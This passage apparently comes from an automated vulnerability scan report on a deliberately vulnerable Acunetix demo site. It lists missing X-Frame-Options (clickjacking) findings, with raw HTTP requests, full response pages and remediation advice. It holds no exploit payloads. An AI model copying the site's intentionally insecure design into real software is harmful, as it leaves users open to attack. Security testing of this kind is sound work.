href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        14. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        15. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        16. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
